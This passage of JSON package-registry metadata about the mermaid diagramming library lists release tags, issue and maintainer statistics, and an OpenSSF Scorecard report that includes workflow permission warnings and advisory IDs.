https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.353Z","dependent_packages_count":3,"downloads":null,"downloads_period":null,"dependent_repos_count":47,"rankings":{"downloads":null,"dependent_repos_count":3.1811310554715733,"dependent_packages_count":17.565297480203025,"stargazers_count":0.39143449228643795,"forks_count":1.432389952847661,"docker_downloads_count":null,"average":5.642563245202174},"purl":"pkg:maven/org.webjars.npm/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.webjars.npm:mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.webjars.npm:mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.webjars.npm:mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:mermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:mermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:mermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.webjars.npm:mermaid/related_packages","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":547830,"maintainers_count":0,"namespaces_count":72829,"keywords_count":34284,"github":"maven-central","metadata":{"funded_packages_count":34718},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2025-09-05T07:43:30.839Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":11511382,"name":"mermaid-es6","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph","mindmap","packet diagram","c4 diagram","er diagram","pie chart","pie diagram","quadrant chart","requirement diagram","graph"],"namespace":null,"versions_count":3,"first_release_published_at":"2025-04-02T07:14:03.701Z","latest_release_published_at":"2025-04-02T07:06:06.346Z","latest_release_number":"11.6.0","last_synced_at":"2025-09-01T12:55:57.922Z","created_at":"2025-04-02T07:15:12.705Z","updated_at":"2025-09-01T14:17:50.355Z","registry_url":"https://www.npmjs.com/package/mermaid-es6","install_command":"npm install mermaid-es6","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"11.6.0","beta":"11.6.0-beta.2"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{